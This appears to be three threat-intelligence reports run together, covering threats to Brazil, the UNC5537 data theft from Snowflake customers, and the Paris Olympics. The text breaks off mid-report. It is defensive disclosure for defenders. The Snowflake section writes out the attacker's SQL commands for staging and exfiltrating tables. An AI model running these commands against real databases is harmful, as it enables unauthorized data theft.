Cyber espionage activity linked to the People’s Republic of China (PRC) targeting Brazil dates back more than a decade. Since 2020, we have observed 15 PRC cyber espionage groups targeting users in Brazil, and these groups have accounted for over 40% of government-backed phishing activity targeting Brazil. As the largest recipient of Chinese investment in Latin America, this volume of PRC cyber espionage is reminiscent of activity in other regions where Chinese government investment has been focused, such as countries within China’s Belt and Road Initiative. In addition to activity targeting Gmail users, PRC groups have targeted Brazil’s military, national government, diplomatic organizations, and the provincial governments of multiple Brazilian states. These groups have targeted users in Brazil using tactics ranging from phishing to malware distribution and exploitation of known vulnerabilities. 

In August 2023, for example, Google detected a campaign from a PRC group that targeted nearly two hundred users in a Brazilian executive branch organization. The phishing emails contained links to an encrypted ZIP archive hosted on a known phishing domain. Organizations in Brazil’s state governments have also been a target. In late 2022, PRC actors used an operational relay box (ORB) network to anonymize their activity and attempted to send a mass phishing campaign to nearly two thousand email addresses, including 70 email addresses in the .br ccTLD, the majority of which belonged to Brazilian state government organizations. The mass email, which Gmail blocked, contained a malicious TAR attachment designed to exploit CVE-2022-41352, an n-day vulnerability in the Zimbra Collaboration Suite that enables an attacker to upload arbitrary files and gain unauthorized access to other user accounts. The campaign targeted organizations globally and appeared opportunistic - most of the targeted email addresses were addressed to the domain admin (e.g., admin@[domain].gov.br). 

PRC cyber espionage activity against local and provincial entities is of note in light of campaigns by threat actors such as UNC4841 that have focused on similar targets globally, including in Brazil. As part of their exploitation of the Barracuda Email Security Gateway in 2023, UNC4841 targeted a Brazilian business association focused on promoting state-level commerce across several industries.

Phishing pages created by PRC cyber espionage groups targeting Brazil’s government

North Korean Government-Backed Groups Targeting Brazil

Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.

In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.

PUKCHONG (UNC4899) sent targets instructions to download a trojanized Python app from GitHub

North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google.  In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.  

One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.

One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem. 

Diminished Activity From Russia Since Start of Ukraine War

Activity by Russian government-backed groups targeting Brazil has diminished significantly since the start of the war in Ukraine. Of the seven Russia-backed groups observed targeting Brazil, over 95% of the phishing activity targeting users in Brazil comes from one group, APT28 (aka FROZENLAKE). APT28’s targeting of Brazil dates back more than a decade, and Brazilian users have regularly been a target in the group’s frequent phishing campaigns. In late 2021, more than 200 Brazil-based users were targeted in large scale phishing campaigns by APT28. In those campaigns, which took place over several days between September and October 2021, APT28 sent credential phishing emails to over 14K recipients globally. Following late 2021, Russian groups have not targeted Brazil on a regular basis - a shift likely due at least in part to Russia’s efforts to prioritize cyber operations focused on Ukraine and NATO.

Brazil’s Unique Cybercrime Ecosystem

Financially motivated threat activity represents a constant, serious threat to users and organizations in Brazil. Notably, we have observed a variety of operations, including ransomware and data theft extortion as well as underground forum and social media advertisements for access to malicious insiders, databases, sensitive information, and specialized tools to compromise Brazilian users and institutions. 

Although cybercriminal actors focused on financial gain represent a transnational threat and emanate from all corners of the globe, particular communities sometimes spring up with more localized characteristics. For example, Russian-language only forums in the eastern European underground market ecosystem shape the flow of malware, data offered for sale, and formation of criminal relationships. Similarly in Brazil, Brazilian Portuguese-specific cybercriminal communities enable a localized and domestic threat. 

Brazilian Cybercrime Communities 

Mandiant’s insights into advertisements and discussions within Brazilian Portuguese-language underground marketplace over the past year illustrate that these actors have access to a variety of malicious tools and products, including the compromise and sale of payment card data, credentials, and sensitive databases; phishing; development and sale of remote access trojans (RATs); insider access; and mobile threats. 

Notably, these actors rely significantly less on traditional underground forums, which are the most common platforms used in other regions, and tend to rely on alternatives such as mobile apps and social media, particularly Telegram and WhatsApp. 

In general, the technical capability of actors engaged in cybercrime activity is generally low to moderate relative to underground communities in other regions. Consistent with past trends, we continue to see threat actors from Latin American underground communities primarily advertise products designed to target their own region. Notably, more experienced members of Brazilian Portuguese-language cybercrime underground often appear willing to teach and mentor less skilled and/or new actors. While some actors charge for this, others offer this help and support for free. Teaching less experienced members for free can help the mentor improve their reputation, grow their group's membership, and demonstrate their own skills and knowledge.

Malware Targeting PIX Interbank Transfer System 

We have observed Latin American-based threat actors leverage and target country-specific payment platforms, either to facilitate sales of services or to target payment information from victims. In the case of Brazil, such activity has focused on Pix, an instant payment platform created and managed by the Brazilian Central Bank. Pix enables instant payments and transfers between bank accounts within seconds using a key, and it is one of the most common methods of payment in Brazil. 

Open source reporting indicates threat actors as recently as late 2023 were involved in distributing malware called “GoPix” to specifically targeted Pix users via malicious advertisement techniques or “malvertising.” The reported functionality of this malware includes the ability to hijack clipboard functionality for Pix or cryptocurrency transactions, replacing the Pix string or wallet address with one controlled by the attacker. 

UNC5176 Distributes URSA Malware 

Another group that has historically targeted users and enterprises across Latin America, is UNC5176, a suspected Brazil-based threat cluster that distributes malware targeting users of Latin American and Spanish banks, including in Brazil. In late April, Mandiant observed an UNC5176 campaign distributing URSA to victim organizations in sectors such as financial services, healthcare, retail, and hospitality. In this recent campaign Mandiant did not observe targeting of entities in Brazil. URSA is a backdoor that is capable of stealing login credentials for various banks, cryptocurrency websites, and email clients. UNC5176 uses emails and malvertising campaigns to compromise users, typically delivering emails that have a ZIP file attached that contains a malicious HTA file. When opened, these HTA files drop a VBS file that connects to a C2 and downloads a second stage VBS file. The downloaded VBS file contains guardrails including anti-VM/Sandbox and OS language checks, if the checks are passed it initiates connections to the C2 and an URSA payload is downloaded and executed.

Beyond Borders: Multifaceted Extortion’s Impact on Brazil 

While many of the financially motivated cyber threats impacting Brazil originate domestically, Brazil also faces global risks such as ransomware and data theft as a means of extortion. While the most prolific multifaceted extortion campaigns continue to focus on North America and Europe, these threat actors have also exploited Brazil. For example, based on analysis of alleged victims listed on Ransomware as a Service (RAAS) RANSOMHUB's data leak site, their second most targeted country based on listed victims is Brazil, after the United States. RANSOMHUB’s ransomware operations have impacted organizations across multiple geographic regions and spanning almost every industry vertical. Since January 2023, across data leak sites (DLS) that Mandiant tracks, for enterprises based in Brazil, the top most targeted verticals were technology, healthcare, and financial services.

Impersonating Official Government Services to Distribute Malware 

Malware distribution campaigns targeting Brazilians frequently use tax and finance-themed lures to convince recipients to open malicious links or files. One financially motivated group we track, PINEAPPLE, regularly masquerades as Brazil’s revenue service, Receita Federal do Brasil, in spam campaigns that attempt to convince users to install the Astaroth infostealer. The overwhelming majority of these campaigns were blocked on arrival for Gmail and Workspace users. The campaigns often spoof Receita Federal’s legitimate email address, receita@gov[.]br, and use different techniques to convince email gateways the email is authentic - for example, using mail forwarding services, which do not drop messages with failed SPF records, or placing unexpected data in the SMTP Return-Path field to trigger a DNS request timeout and cause SPF email authentication checks to fail. 

In one recent campaign blocked by Gmail, PINEAPPLE’s spam emails impersonated Brazil’s finance ministry and directed recipients to a social engineering page that mimicked the Brazilian government’s electronic tax document system (Portal da Nota Fiscal Eletrônica). The site directed visitors to click a button to view an electronic tax document generated by the system. If clicked, the link directed users to an LNK payload hosted on an attacker-controlled IP address. In a likely effort to evade detection, the attackers incorporated multiple legitimate services into the campaign. Links on the social engineering site used the ms-search:// protocol to direct users to the attackers’ IP address, and threat actors hosted their site on GCP Cloud Run. Google disabled the malicious Cloud Run site and suspended the associated GCP project.

Social engineering page impersonating the Brazilian government’s electronic tax document system (Portal da Nota Fiscal Eletrônica)

Abusing Legitimate Cloud Services to Distribute Astaroth Infostealer

PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil. The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others. 

In 2023, teams across Google worked together to disrupt PINEAPPLE’s misuse of Google Cloud Run and Cloud Functions. In those campaigns, PINEAPPLE used compromised Google Cloud instances and Google Cloud projects they created themselves to create their own Google Cloud container URLs hosted on legitimate GCP domains such as cloudfunctions.net and run.app. The URLs hosted landing pages that then redirected targets to malicious infrastructure that dropped the Astaroth infostealer. Upon discovery, Google disabled the malicious Cloud Run and Cloud Functions sites and suspended the associated GCP projects. We also increased our detection and response coverage and implemented product level security improvements to significantly increase the difficulty of our platforms being used by this threat actor. These mitigation measures reduced the volume of the Astaroth campaigns by 99% compared to the campaign’s peak. 

PINEAPPLE reacts quickly and iteratively adapts their TTPs in response to new detections. Following the disruption of their scaled abuse campaigns, PINEAPPLE’s abuse of Cloud Run has continued intermittently at lower volumes. The group has also experimented with other cloud services, including Google Compute Engine. Similar to their past campaigns, PINEAPPLE distributed malicious links via email. The GCE links were configured to serve an unencrypted archive such as a ZIP, LNK, or other, lesser known file types. Google Cloud Trust & Safety suspended PINEAPPLE’s attacker-operated GCP projects. Shortly thereafter, the group began experimenting with other cloud platforms including Microsoft and Tencent. 

Recent PINEAPPLE campaigns in May and June 2024 continued to spoof Receita Federal and hosted landing pages on dedicated virtual servers created through GoDaddy’s reverse IP hostname service. In other recent cases, PINEAPPLE has used mail forwarding services to send emails that appear to come from WhatsApp. We continue to monitor their campaigns and regularly update Google’s protections to ensure users are protected. 

Credential Phishing 

Credential phishing is also a common threat affecting users and organizations in Brazil. In 2023, for example, Google disrupted phishing activity hosted on GCP serverless projects that were being used to harvest credentials for one of Latin America's largest online payment platforms. The pages were operated by Latin America-based financially motivated actor, FLUXROOT, a group best known for their distribution of the Grandoreiro banking malware. Upon discovering the FLUXROOT sites, we updated detection signatures and added the sites to the Safe Browsing blocklist. More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware.

Credential harvesting page hosted on GCP serverless project

Conclusion

As Brazil continues to grow in economic and geopolitical significance, it will remain an attractive target for threat actors driven by diverse motivations. The country’s digital landscape is a complex arena, developed and expanded over the years by a convergence of both global and local threats. Global cyber espionage actors from North Korea, the People’s Republic of China (PRC), and Russia as well as multinational cybercriminals pose longstanding threats, and Brazil's domestic cybercriminal market remains a persistent challenge–increasing the complexities of this dynamic landscape.To effectively safeguard Brazilian enterprises and users, it is important to understand this unique interplay of threats and adopt a proactive approach to cybersecurity.

We hope the analysis and research here helps to inform defenders in Brazil, providing fresh insights for collective defense. At Google, we are committed to supporting the safety and security of online users everywhere and will continue to take action to disrupt malicious activity to protect our users and help make the Internet safe for all.

Indicators of Compromise (IOCs) Host-Based Indicators (HBIs)

Filename

SHA256

Description

Question Sheet.pdf

e9841e5c218611add64c07b6d6e8b2f2
a899ee32da2bb0326238b332f34bd045

Benign PDF delivered in PUKCHONG social engineering activity targeting cryptocurrency firms

0tiukr.verdelimp.com518.429006.
45528.lnk

38fad88f0fefb385fdfba2e0be28a1fe6
302387bc4a0a9f8b010cca09836361d

Malicious LNK dropped in PINEAPPLE campaigns

NFe92759625212697.115112.
62531.lnk

57a0a64ff7d5ca462fe18857f552ab186
d118a80ecad741be62ee16e500ac424

Malicious LNK dropped in PINEAPPLE campaigns

UPDATE (June 17): We have released our Snowflake threat hunting guide, which contains guidance and queries for detecting abnormal and malicious activity across Snowflake customer database instances. Default retention policies for the relevant views enable threat hunting across the past 1 year (365 days).

Introduction

Through the course of our incident response engagements and threat intelligence collections, Mandiant has identified a threat campaign targeting Snowflake customer database instances with the intent of data theft and extortion. Snowflake is a multi-cloud data warehousing platform used to store and analyze large amounts of structured and unstructured data. Mandiant tracks this cluster of activity as UNC5537, a financially motivated threat actor suspected to have stolen a significant volume of records from Snowflake customer environments. UNC5537 is systematically compromising Snowflake customer instances using stolen customer credentials, advertising victim data for sale on cybercrime forums, and attempting to extort many of the victims.

Mandiant's investigation has not found any evidence to suggest that unauthorized access to Snowflake customer accounts stemmed from a breach of Snowflake's enterprise environment. Instead, every incident Mandiant responded to associated with this campaign was traced back to compromised customer credentials.

In April 2024, Mandiant received threat intelligence on database records that were subsequently determined to have originated from a victim’s Snowflake instance. Mandiant notified the victim, who then engaged Mandiant to investigate suspected data theft involving their Snowflake instance. During this investigation, Mandiant determined that the organization’s Snowflake instance had been compromised by a threat actor using credentials previously stolen via infostealer malware. The threat actor used these stolen credentials to access the customer’s Snowflake instance and ultimately exfiltrate valuable data. At the time of the compromise, the account did not have multi-factor authentication (MFA) enabled.

On May 22, 2024 upon obtaining additional intelligence identifying a broader campaign targeting additional Snowflake customer instances, Mandiant immediately contacted Snowflake and began notifying potential victims through our Victim Notification Program. To date, Mandiant and Snowflake have notified approximately 165 potentially exposed organizations. Snowflake’s Customer Support has been directly engaged with these customers to ensure the safety of their accounts and data. Mandiant and Snowflake have been conducting a joint investigation into this ongoing threat campaign and coordinating with relevant law enforcement agencies. On May 30, 2024, Snowflake published detailed detection and hardening guidance to Snowflake customers.

Campaign Overview

Based on our investigations to date, UNC5537 obtained access to multiple organizations’ Snowflake customer instances via stolen customer credentials. These credentials were primarily obtained from multiple infostealer malware campaigns that infected non-Snowflake owned systems. This allowed the threat actor to gain access to the affected customer accounts and led to the export of a significant volume of customer data from the respective Snowflake customer instances. The threat actor has subsequently begun to extort many of the victims directly and is actively attempting to sell the stolen customer data on recognized cybercriminal forums.

Mandiant identified that the majority of the credentials used by UNC5537 were available from historical infostealer infections, some of which dated as far back as 2020.

The threat campaign conducted by UNC5537 has resulted in numerous successful compromises due to three primary factors:

1. The impacted accounts were not configured with multi-factor authentication enabled, meaning successful authentication only required a valid username and password.
2. Credentials identified in infostealer malware output were still valid, in some cases years after they were stolen, and had not been rotated or updated.
3. The impacted Snowflake customer instances did not have network allow lists in place to only allow access from trusted locations.

UNC5537 Campaign Timeline  Credential Exposure

Mandiant identified that the threat actor used Snowflake customer credentials that were previously exposed via several infostealer malware variants, including; VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER. For the organizations that directly engaged Mandiant for incident response services, Mandiant determined the root cause of their Snowflake instance compromise was exposed credentials. Further, according to Mandiant and Snowflake’s analysis, at least 79.7% of the accounts leveraged by the threat actor in this campaign had prior credential exposure. 

The earliest infostealer infection date observed associated with a credential leveraged by the threat actor dated back to November 2020. In total, Mandiant identified hundreds of customer Snowflake credentials exposed via infostealers since 2020. 

Stolen credentials pose a serious security risk to organizations and were the fourth most notable initial intrusion vector in 2023, as 10% of intrusions began with stolen credentials. Attackers often obtain credentials due to password reuse or users inadvertently downloading trojanized software on corporate or personal devices. The prevalence of both widespread infostealer malware and credential purchasing continue to challenge defenders.

Contractor Accounts

In several Snowflake related investigations, Mandiant observed that the initial compromise of infostealer malware occurred on contractor systems that were also used for personal activities, including gaming and downloads of pirated software. 

Contractors that customers engage to assist with their use of Snowflake may utilize personal and/or non-monitored laptops that exacerbate this initial entry vector. These devices, often used to access the systems of multiple organizations, present a significant risk. If compromised by infostealer malware, a single contractor's laptop can facilitate threat actor access across multiple organizations, often with IT and administrator-level privileges. 

Reconnaissance 

Initial access to Snowflake customer instances often occurred via the native web-based UI (SnowFlake UI AKA SnowSight) and/or command-line interface (CLI) tool (SnowSQL) running on Windows Server 2022. Mandiant identified additional access leveraging an attacker-named utility, “rapeflake”, which Mandiant tracks as FROSTBITE. 

While Mandiant has not yet recovered a complete sample of FROSTBITE, Mandiant assesses FROSTBITE is used to perform reconnaissance against target Snowflake instances. Mandiant observed usage of both .NET and Java versions of FROSTBITE. The .NET version interacts with the Snowflake .NET driver. The JAVA version interacts with the Snowflake JDBC driver. FROSTBITE has been observed performing SQL recon activities including listing users, current roles, current IPs, session IDs, and organization names. Mandiant also observed UNC5537 use a publicly available database management utility DBeaver Ultimate to connect and run queries across Snowflake instances.

Example FROSTBITE Snowflake Log Entry Deployment: <REDACTED> | Account ID: <REDACTED> | Account Name: <REDACTED> | User Name: <REDACTED> | Client IP: 45.27.26.205 | Client App ID: PythonConnector 3.10.1 | Client App Version: 3.10.1 | Client Environment: {\n "APPLICATION": "rapeflake",\n "LOGIN_TIMEOUT": null,\n "NETWORK_TIMEOUT": null,\n "OCSP_MODE": "FAIL_OPEN",\n "OS": "Darwin",\n "OS_VERSION": "macOS-13.6.7-arm64-arm-64bit",\n "PYTHON_COMPILER": "Clang 14.0.3 (clang-1403.0.22.14.1)",\n "PYTHON_RUNTIME": "CPython",\n "PYTHON_VERSION": "3.11.4",\n "SOCKET_TIMEOUT": null,\n "TRACING": 30\n} (2024/05/31 20:10:13) Example DBeaver Ultimate Snowflake Log Entry Deployment Query: Sessions | Deployment: <REDACTED> | Account ID: <REDACTED> | Account Name: <REDACTED> | User Name: <REDACTED> | Client IP: 37.19.210.21 | Client App ID: JDBC 3.13.30 | Client App Version: 3.13.30 | Client Environment: {\n "APPLICATION": "DBeaver_DBeaverUltimate",\n "JAVA_RUNTIME": "Java(TM) SE Runtime Environment",\n "JAVA_VERSION": "17.0.10",\n "JAVA_VM": "Java HotSpot(TM) 64-Bit Server VM",\n "OCSP_MODE": "FAIL_OPEN",\n "OS": "Windows Server 2022",\n "OS_VERSION": "10.0",\n "account": "<REDACTED>",\n "application": "DBeaver_DBeaverUltimate",\n "database": "<REDACTED>",\n "password": "****",\n "schema": "<REDACTED>",\n "serverURL": "https://<REDACTED>.snowflakecomputing.com:443/",\n "tracing": "INFO",\n "user": "<REDACTED>",\n "warehouse": "<REDACTED>"\n} (2024/04/14 10:04:10) Complete Mission

Mandiant observed UNC5537 repeatedly executing similar SQL commands across numerous customer Snowflake instances to stage and exfiltrate data. The following commands were observed for data staging and exfiltration.

SHOW TABLES

UNC5537 utilized the SHOW TABLES command to perform reconnaissance, listing out all databases and associated tables present across the impacted customer environments.

SHOW TABLES SELECT * FROM 

UNC5537 utilized the SELECT command to download individual tables of threat actor interest.

SELECT * FROM <Target Database>.<Target Schema>.<Target Table> LIST/LS

UNC5537 attempted to enumerate other stages using the LIST command prior to creating temporary stages.

ls <internal or external stage name> CREATE (TEMP|TEMPORARY) STAGE

UNC5537 created temporary stages for data staging using the CREATE STAGE command. Stages are named tables that store data files for loading and unloading into database tables. If the stage is identified as temporary on creation, the stage is deleted once the creator’s current Snowflake session ends.

CREATE TEMPORARY STAGE <Redacted Database>.<Redacted Schema>. <Redacted Attacker Stage Name>; COPY INTO

UNC5537 utilized the COPY INTO command to copy data into the previously created temporary stages, shown as follows. The COPY INTO command can be used to copy information to/from internal stages, external stages tied to cloud services, and internal Snowflake tables. The threat actor was seen compressing the results as a GZIP file using the COMPRESSION parameter to reduce the overall size of data before exfiltration.

COPY INTO @<Attacker Stage and Path> FROM (select * FROM <Target Database>.<Target Schema>.<Target Table> ) FILE_FORMAT = ( TYPE='CSV' COMPRESSION=GZIP FIELD_DELIMITER=',' ESCAPE=NONE ESCAPE_UNENCLOSED_FIELD=NONE date_format='AUTO' time_format='AUTO' timestamp_format='AUTO' binary_format='UTF-8' field_optionally_enclosed_by='"' null_if='' EMPTY_FIELD_AS_NULL = FALSE ) overwrite=TRUE single=FALSE max_file_size=5368709120 header=TRUE; GET

Finally, UNC5537 utilized the GET command to exfiltrate data from the temporary stages to locally specified directories.

GET @<target stage and filepath> file:///<Attacker Local Machine Path>; UNC5537 Attribution

Mandiant has been tracking UNC5537, a financially motivated threat actor, as a distinct cluster since May 2024. UNC5537 has targeted hundreds of organizations worldwide, and frequently extorts victims for financial gain. UNC5537 operates under various aliases on Telegram channels and cybercrime forums. Mandiant has identified members having associations to other tracked groups. Mandiant assesses with moderate confidence that UNC5537 comprises members based in North America, and collaborates with an additional member in Turkey.

Attacker Infrastructure

UNC5537 primarily used Mullvad or Private Internet Access (PIA) VPN IP addresses to access victim Snowflake instances. When exfiltrating data, Mandiant observed the use of VPS systems from ALEXHOST SRL (AS200019), a Moldovan provider. UNC5537 was observed storing stolen victim data on several international VPS providers as well as the cloud storage provider MEGA.  

Outlook & Implications

UNC5537’s campaign against Snowflake customer instances is not the result of any particularly novel or sophisticated tool, technique, or procedure. This campaign’s broad impact is the consequence of the growing infostealer marketplace and missed opportunities to further secure credentials:

• UNC5537 was likely able to aggregate credentials for Snowflake victim instances by accessing a variety of different sources of infostealer logs. The underground infostealer economy is also extremely robust, and large lists of stolen credentials exist both for free and for purchase inside and outside of the dark web.
• The affected customer instances did not require multi-factor authentication and in many cases, the credentials had not been rotated for as long as four years. Network allow lists were also not used to limit access to trusted locations.

This campaign highlights the consequences of vast amounts of credentials circulating on the infostealer marketplace and may be representative of a specific focus by threat actors on similar SaaS platforms. Mandiant assesses UNC5537 will continue this pattern of intrusion, targeting additional SaaS platforms in the near future.

The broad impact of this campaign underscores the urgent need for credential monitoring, the universal enforcement of MFA and secure authentication, limiting traffic to trusted locations for crown jewels, and alerting on abnormal access attempts. For further recommendations on how to harden Snowflake environments, please see Snowflake’s Hardening Guide.

Indicators of Compromise (IOCs) Google Threat Intelligence Collection of IPs

A Google Threat Intelligence Collection of IPs is available.

Client Application IDS

• Rapeflake
• DBeaver_DBeaverUltimate
• Go 1.1.5
• JDBC 3.13.30
• JDBC 3.15.0
• PythonConnector 2.7.6
• SnowSQL 1.2.32
• Snowflake UI 
• Snowsight Al

Additional IOCs are available in Snowflake’s updated blog post.

Written by: Michelle Cantos, Jamie Collier

 

Executive Summary 

• Mandiant assesses with high confidence that the Paris Olympics faces an elevated risk of cyber threat activity, including cyber espionage, disruptive and destructive operations, financially-motivated activity, hacktivism, and information operations. 
• Olympics-related cyber threats could realistically impact various targets including event organizers and sponsors, ticketing systems, Paris infrastructure, and athletes and spectators traveling to the event. 
• Mandiant assesses with high confidence that Russian threat groups pose the highest risk to the Olympics. While China, Iran, and North Korea state sponsored actors also pose a moderate to low risk.
• To reduce the risk of cyber threats associated with the Paris Olympics, organizations should update their threat profiles, conduct security awareness training, and consider travel-related cyber risks.
• The security community is better prepared for the cyber threats facing the Paris Olympics than it has been for previous Games, thanks to the insights gained from past events. While some entities may face unfamiliar state-sponsored threats, many of the cybercriminal threats will be familiar. While the technical disruption caused by hacktivism and information operations is often temporary, these operations can have an outsized impact during high-profile events with a global audience.

Introduction 

The 2024 Summer Olympics taking place in Paris, France between July and August creates opportunities for a range of cyber threat actors to pursue profit, notoriety, and intelligence. For organizations involved in the event, understanding relevant threats is key to developing a resilient security posture. Defenders should prepare against a variety of threats that will likely be interested in targeting the Games for different reasons: 

• Cyber espionage groups are likely to target the 2024 Olympics for information gathering purposes, due to the volume of government officials and senior decision makers attending.
• Disruptive and destructive operations could potentially target the Games to cause negative psychological effects and reputational damage. This type of activity could take the form of website defacements, distributed denial of service (DDoS) attacks, the deployment of wiper malware, and operational technology (OT) targeting. As a high profile, large-scale sporting event with a global audience, the Olympics represents an ideal stage for such operations given that the impact of any disruption would be significantly magnified. 
• Information operations will likely leverage interest in the Olympics to spread narratives and disinformation to target audiences. In some cases, threat actors may leverage disruptive and destructive attacks to amplify the spread of particular narratives in hybrid operations.
• Financially-motivated actors are likely to target the Olympics in various ways, including ticket scams, theft of PII, and extortion against entities during a period of heightened pressure. Capitalizing on interest in the games, threat actors are likely to use olympics-related lures in social engineering operations that are not necessarily targeting the games.

Figure 1: Potential threats to the 2024 Summer Olympics

Olympics-related cyber operations could impact a variety of entities. For some organizations involved in the Games such as sponsors, this could expose them to state-sponsored actors and destructive campaigns that are not typically active in their sectors. Other threats, such as cybercrime and extortion operations, will be more familiar, yet will likely become more prolific and persistent against entities involved in the Games.

Figure 2: Potential targets of Olympic-related operations

State Sponsored Threat Activity 

State-sponsored threats pose the most significant, high severity threat to the Summer 2024 Olympics. Mandiant assesses with high confidence that Russia poses the most severe threat to the Olympics given its repeated targeting of previous Olympic games, its tense relationship with Europe, and recent pro-Russia information operations having already targeted France. Other state-sponsored actors, such as those from China, Iran, and North Korea also pose a risk, albeit to a lesser extent.

Russia 

Russian state-sponsored cyber threat activity poses the greatest risk to the Olympics. In addition to intelligence collection activities, Russian operators have demonstrated the capability and willingness to conduct destructive campaigns targeting past Olympics events and hybrid operations in which intrusions support influence campaigns. Mandiant has observed Russian espionage actors conduct cyber threat activity against previous iterations of the Olympic games, disrupting the event itself and undermining the safety and security of organizations related to the Olympics. France may face an elevated risk of Russian cyber threat activity given the country’s financial and military support for Ukraine after Russia’s invasion in February 2022. 

While Russian athletes can compete in the Olympics this year, they will not represent their home country, are unable to participate in the opening ceremony, and must compete as neutral athletes. Russia’s perceived grievances at its athletes being once again banned from competing under the Russian flag elevate the threat from Russian cyber attacks compared to other states.

Based on a well-documented history of targeting past Games, Mandiant assesses with high confidence that out of the Russian threat actors we track, APT44 is most likely to target the upcoming games, and the most likely to conduct impactful disruptive, destructive, or hybrid operations in addition to intelligence collection.

Figure 3: Significant Russian Operations Targeting Past Olympic Games

APT44 Android Malware Campaign Targeting Users in South Korea Before 2018 Winter Games in PyeongChang 

Beginning in late 2017, APT44 (alias FROZENBARENTS) targeted organizations involved in Olympic activities in South Korea. The activity included credential phishing, and distribution of Windows,MacOS, and Android malware. In the Android campaign, APT44 obtained legitimate copies of Android applications popular in South Korea, modified them to add a custom mobile implant, and then published the trojanized apps to the Play Store. The implant, CHEMISTGAMES, was a modular framework designed for gathering data at scale, and included significant automation, abstraction, and specialization for mobile devices. The modular structure of CHEMISTGAMES ensured that the attackers could hide sensitive payloads and reserve them for specific targeted devices.

Figure 4: Prior to the Olympics, APT44 modified Android apps popular in South Korea, including a bus timetable app and an app for checking apartment rental prices

Google’s Threat Analysis Group (TAG) discovered the Android campaign, developed signatures to protect user devices and block the malware on Play, and banned attacker-controlled developer accounts. Those detections protected users in other APT44 campaigns that attempted to infect users with CHEMISTGAMES, including an attempt to target Ukrainians with a fake webmail app, and domestically-focused campaigns targeting Russian businesses.

Mandiant suggests that UNC4057 (aka COLDRIVER) also poses a risk, despite no previously observed targeting of the Games. The group has conducted both cyber espionage and information operations activity in support of Russia, collecting personally identifiable information (PII) via credential harvesting operations that may support the nation’s strategic intelligence priorities, and performing hack-and leak-campaigns to sow discontent in the UK in 2022. This activity cluster may target French organizations affiliated with the games and high profile individuals from NATO member countries who may be in attendance.

China 

Mandiant Intelligence assesses with moderate confidence that People's Republic of China (PRC) sponsored threats pose a moderate risk to the 2024 Paris Olympics. We suggest that APT31, APT15, UNC4713, and TEMP.Hex are most likely to target organizations and individuals related to the event given previous targeting of governments as well as civil society and non-profits in Europe. High profile government officials and senior decision makers attending the event will likely be an attractive target for PRC state sponsored threat actors seeking PII, credentials, or other sensitive information to support their national interests. This creates a heightened risk of spearphishing, credential harvesting, and intelligence collection operations. 

While PRC espionage operators have demonstrated a capability and willingness to target operational technology systems, it is unlikely they will leverage destructive or disruptive campaigns targeting the Summer Olympics.

Iran

Mandiant Intelligence assesses with moderate confidence that Iranian state sponsored threats, primarily APT42, represent a moderate to low threat to the 2024 Summer Olympics. We have observed APT42 compromise civil society and non-profit organizations and government entities throughout Europe. Iranian threat actors may leverage the Games, either using the Olympics as lure material or targeting attendees themselves, to support campaigns against these industry verticals. Notably the ongoing conflict in Gaza may impact the frequency and tempo of Iranian intelligence-gathering and information operations activity in the short- to mid-term, with Iranian actors increasing their operations in Israel.

North Korea

Mandiant Intelligence assesses with moderate confidence that North Korean threat actors pose a low threat to the 2024 Summer Olympics. APT43 might leverage information surrounding the Games as lure material for financially motivated operations or potentially as material for social engineering campaigns to build rapport with targets.

Information Operations & Hacktivism 

The high profile nature of the Olympics makes the event a popular target for hacktivism and information operations that could capitalize on interest in the Games to conduct high profile operations. Although hacktivists may have limited resources and capabilities, a well-timed disruption could achieve their goals. 

Whilst Pro-Russia information operations could be the most prominent ones using Olympics-themed content, campaigns promoting the interests of PRC and Belarus may also use interest in the event to promote various narratives. Hacktivist and information operations actors share many tactics, techniques and procedures, and these groups could also create new personas specifically for their activity related to the Olympics. 

Russia

Mandiant Intelligence assesses with high confidence that pro-Russian information operations will pose a frequent, moderate severity threat to the Summer 2024 Olympic Games. We have observed information operations promoting pro-Russia, anti-Ukraine, and anti-Western narratives leveraging the Olympics due to the popularity of the Games. Additionally political retribution for France’s pro-Ukraine stance and Russia’s ban from competing at the games under their flag may drive information operations activity promoting Russian interests. 

